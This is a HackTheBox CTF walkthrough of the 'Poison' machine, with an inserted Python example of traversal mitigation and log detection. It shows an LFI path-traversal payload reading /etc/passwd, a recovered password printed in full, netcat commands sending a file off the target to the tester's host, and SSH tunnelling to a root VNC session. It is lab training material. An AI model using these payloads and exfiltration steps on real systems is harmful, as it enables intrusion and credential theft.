writeup
HackTheBox
Poison
medium
OSCP
# Nmap 7.92 scan initiated Fri Jun 10 07:21:26 2022 as: nmap -sV -T4 -sS -v -sC -p- -Pn -oN ports3 10.10.10.84
Nmap scan report for 10.10.10.84
Host is up (0.042s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 10 07:28:31 2022 -- 1 IP address (1 host up) scanned in 424.26 seconds
Opening the website, we see a form that lets us type the name of a file to load into the page:
After looking at each file listed in listfiles.php we can see that one of them is a txt file, so let's look into it.
Looking at the URL we can easily recognize an LFI vulnerability, so let's use it to load the pwdbackup.txt file with this URL:
http://10.10.10.84/browse.php?file=pwdbackup.txt
Reading it we see that it's encoded, but encoded means we can decode it easily. I'm going to use CyberChef; it looks like base64, so let's decode it 13 times.
After decoding it 13 times we get the password:
Charix!2#4%6&8(0
I suppose this may be the SSH password, but we don't know the user, so since we have an LFI vulnerability let's read the /etc/passwd file to find the users.
To do this we use an LFI payload that walks back up the directories and into /etc/passwd:
http://10.10.10.84/browse.php?file=../../../../../../etc/passwd
Knowing a little bit of Unix, any user with an id below 1000 is normally a service account, so we now know the user for SSH. Let's connect with the charix user and the decoded password.
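As an added example (my own code, not the author's and not the real browse.php, whose source the writeup does not show), here is the traversal above in Python: the naive join that causes the LFI beside a handler that confines requests to the web root, plus a check over constructed Apache access-log lines that mirror the two URLs used above. The web root, log lines and the .txt-only rule are assumptions.

```python
import os
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the browse.php web root (assumption: a directory of
# plain .txt files; the writeup does not show the real layout or PHP source).
WEB_ROOT = Path(tempfile.mkdtemp()).resolve()
(WEB_ROOT / "pwdbackup.txt").write_text("constructed sample content\n")

def resolve_naive(name: str) -> Path:
    """The LFI pattern: join user input to the root and trust the result."""
    return (WEB_ROOT / name).resolve()

def escapes_root(name: str) -> bool:
    """True when the joined path lands outside WEB_ROOT (any ../ beyond it)."""
    target = resolve_naive(name)
    return os.path.commonpath([str(WEB_ROOT), str(target)]) != str(WEB_ROOT)

def browse_hardened(name: str) -> Path:
    """Fixed handler: canonicalise, confine to WEB_ROOT, allow only .txt files."""
    if escapes_root(name):
        raise PermissionError(f"request escapes web root: {name!r}")
    target = resolve_naive(name)
    if target.suffix != ".txt" or not target.is_file():
        raise FileNotFoundError(name)
    return target

# Constructed Apache access-log lines mirroring the writeup's two URLs plus a
# URL-encoded variant; client IP, timestamps and sizes are made up.
ACCESS_LOG = [
    '10.10.10.10 - - [10/Jun/2022:07:30:01 +0000] "GET /browse.php?file=pwdbackup.txt HTTP/1.1" 200 512',
    '10.10.10.10 - - [10/Jun/2022:07:31:12 +0000] "GET /browse.php?file=../../../../../../etc/passwd HTTP/1.1" 200 1337',
    '10.10.10.10 - - [10/Jun/2022:07:31:40 +0000] "GET /browse.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1337',
]
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def traversal_hits(lines):
    """Return each decoded file= value whose path would leave the web root."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        for value in parse_qs(urlsplit(m.group(1)).query).get("file", []):
            if escapes_root(value):
                hits.append(value)
    return hits
```

The same commonpath check flags the request in the log and rejects it in the handler, so one rule covers both detection and mitigation.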
After that we have the user flag:
It's time to privesc!
The first thing we do is try to unzip the secret zip.
We can't unzip it on the target machine, so let's download it to our machine; to do this we are going to use netcat, which comes installed on the machine.
We start a netcat listener on our machine and a netcat connection from the target machine to transfer the file:
First execute this command on our machine:
nc -nvlp 9999 > secret.zip
Then execute this on the target machine:
nc -nv 10.10.10.10 9999 < secret.zip
After executing this we receive the secret.zip file on our machine!
Let's try to unzip it using the same password as the SSH connection:
Charix!2#4%6&8(0
After unzipping it we see that the secret file has some strange characters and is a Non-ISO file type:
After that it's time to look at the machine again and enumerate more to see what we can do.
Checking some common things and using scripts like linpeas and other privesc scripts, I remembered to look at the running processes, so it's time to run:
ps aux
After executing this I found something interesting.
There is a VNC server running on the machine as root, but we can't reach it from outside because it didn't show up in the port scan, so we have to set up an SSH tunnel to reach the VNC service.
To see more info about VNC let's look at the HackTricks page;
there I found that we can decrypt the secret file with a tool called vncpwd. After downloading and compiling it we obtain the plaintext password for the VNC.
With this, and knowing that the VNC port is 5901, it's time to start the SSH tunnel and try to connect.
ssh charix@10.10.10.84 -L 1337:localhost:5901 -fN
With this command we start the SSH tunnel (a local port forward with -L), and with -fN we indicate that we only want the forwarding and don't need an SSH terminal.
Now it's time to connect to VNC using the secret file, because in this case the decrypted password didn't work well, so we use the secret file directly:
sudo vncviewer -passwd secret localhost:1337
After that a VNC window pops up logged in as root, so we can read the root flag.
To make it easier to work with, I changed the root password to root:root and logged in with SSH because my VNC didn't work very well.
And that's all, we pwned the machine! To better understand the pivoting part and the SSH connections I really recommend the Wreath lab from TryHackMe, which explains very well how it all works.